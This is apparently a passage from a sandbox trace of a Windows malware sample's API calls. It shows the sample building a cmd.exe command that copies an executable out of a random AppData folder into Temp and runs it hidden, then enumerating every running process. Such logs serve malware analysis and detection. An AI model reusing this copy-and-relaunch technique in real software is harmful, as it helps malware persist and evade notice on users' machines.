lpWideCharStr="\x47\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x57\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.395] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbe0, cbMultiByte=1, lpWideCharStr=0x12ebc8, cchWideChar=2047 | out: lpWideCharStr="\x4e\x1c5f\xfc00\x12\xe5d4\xd341\x655a\xb210\x8179\xdc9f\x7379\xf5ba\xf36\xa9d2\x1dff\x137d\x3f03\xbd3b\xa862\x294f\xc099\x8eac\x9d74\xc903\x36c7\xccb8\x1bab\x5d14\xede7\x12af\xc8e6\x4663\xac35\x2032\xfff7\x6628\x17e8\x6318\x4443\x7357\x3513\xade\x364\x3422\x4d0f\xeaaa\xc8c9\x8595\xa945\x310a\xfab5\x1ef1\xbba1\xdcc0\x4640\xf50b\xe628\x12\x6cc2\x967b\xecb8\x12\x97e2\x769b\x4610\x838c\xfffe\xffff\xebf7\x7695\x2079\x7691") returned 1 [0173.396] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0173.396] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x38 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x38 [0173.396] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0173.396] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0173.396] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]", cchLength=0x63 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]") returned 0x63 [0173.396] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0173.396] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" [PARAMS]", cchLength=0xb1 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\WSPGAGWN.EXE\" && \"C:\\USERS\\EEBSYM5\\APPDATA\\LOCAL\\TEMP\\WSPGAGWN.EXE\" [PARAMS]") returned 0xb1 [0173.396] CharUpperBuffW (in: lpsz="[PARAMS]", cchLength=0x8 | out: lpsz="[PARAMS]") returned 0x8 [0173.396] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb20*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb10 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\WsPgAGWN.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"100_OK\" \"60000\"", lpProcessInformation=0x12fb10*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xaa0, dwThreadId=0x968)) returned 1 [0173.401] CloseHandle (hObject=0x1b4) returned 1 [0173.401] CloseHandle (hObject=0x114) returned 1 [0173.401] Sleep (dwMilliseconds=0xfa) [0173.783] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x120 [0173.789] Process32FirstW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0173.790] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0173.791] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0173.793] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.794] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0173.795] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0173.796] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0173.798] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0173.799] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0173.800] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0173.801] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.803] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.804] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.806] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.807] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.808] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0173.810] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.811] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.812] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0173.813] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.815] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.816] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0173.817] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0173.818] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0173.820] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.908] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0173.910] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0173.911] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0173.912] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0173.913] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0173.914] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0173.916] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0173.917] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0173.918] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0173.919] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0173.921] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0173.922] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0173.923] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0173.924] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0173.925] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0173.926] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0173.927] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0173.929] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0173.930] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0173.931] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0173.932] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0173.933] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0173.935] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0173.936] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0173.937] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0173.938] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xdf4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.939] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.940] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0xe7c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0173.941] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.942] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.943] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.944] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0173.945] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0173.946] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0174.067] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0174.068] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0174.069] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0174.070] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0174.071] Process32NextW (in: hSnapshot=0x120, lppe=0x12f938 | out: lppe=0x12f938*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0174.072] CloseHandle (hObject=0x120) returned 1 [0174.072] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0174.072] CharUpperBuffW (in: lpsz="C:\\Users\\All 